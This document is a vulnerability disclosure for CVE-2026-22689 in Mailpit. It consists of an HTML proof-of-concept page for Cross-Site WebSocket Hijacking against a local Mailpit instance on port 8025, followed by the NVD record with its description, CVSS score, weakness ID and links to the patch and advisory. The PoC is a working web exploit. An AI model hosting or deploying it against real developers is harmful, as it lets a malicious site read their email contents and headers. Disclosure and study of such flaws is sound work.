CVE-2026-22689

<!-- CSWSH PoC for CVE-2026-22689 --> <!DOCTYPE html> <html> <head> <title>CVE-2026-22689 PoC</title> </head> <body> <h1>Mailpit CSWSH Attack PoC</h1> <div id="output"></div> <script> function log(message) { document.getElementById('output').innerHTML += message + '<br>'; console.log(message); } // Attempt WebSocket connection to Mailpit const ws = new WebSocket('ws://localhost:8025'); ws.onopen = function() { log('[+] WebSocket connection established!'); log('[+] Waiting for data from Mailpit...'); }; ws.onmessage = function(event) { log('[+] Received data: ' + event.data); }; ws.onerror = function(error) { log('[-] WebSocket error: ' + error); }; ws.onclose = function() { log('[-] WebSocket connection closed'); }; </script> </body> </html>

{"cve": {"id": "CVE-2026-22689", "sourceIdentifier": "[email protected]", "published": "2026-01-10T06:15:51.900", "lastModified": "2026-02-18T17:45:58.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mailpit is an email testing tool and API for developers. Prior to version 1.28.2, the Mailpit WebSocket server is configured to accept connections from any origin. This lack of Origin header validation introduces a Cross-Site WebSocket Hijacking (CSWSH) vulnerability. An attacker can host a malicious website that, when visited by a developer running Mailpit locally, establishes a WebSocket connection to the victim's Mailpit instance (default ws://localhost:8025). This allows the attacker to intercept sensitive data such as email contents, headers, and server statistics in real-time. This issue has been patched in version 1.28.2."}, {"lang": "es", "value": "Mailpit es una herramienta de prueba de correo electrónico y API para desarrolladores. Antes de la versión 1.28.2, el servidor WebSocket de Mailpit está configurado para aceptar conexiones desde cualquier origen. Esta falta de validación del encabezado Origin introduce una vulnerabilidad de Cross-Site WebSocket Hijacking (CSWSH). Un atacante puede alojar un sitio web malicioso que, cuando es visitado por un desarrollador que ejecuta Mailpit localmente, establece una conexión WebSocket con la instancia de Mailpit de la víctima (por defecto ws://localhost:8025). Esto permite al atacante interceptar datos sensibles como el contenido de los correos electrónicos, los encabezados y las estadísticas del servidor en tiempo real. Este problema ha sido parcheado en la versión 1.28.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1385"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.28.2", "matchCriteriaId": "D35BCA11-BA2A-4A42-9488-7A39F44D3AF2"}]}]}], "references": [{"url": "https://github.com/axllent/mailpit/commit/6f1f4f34c98989fd873261018fb73830b30aec3f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/axllent/mailpit/security/advisories/GHSA-524m-q5m7-79mm", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}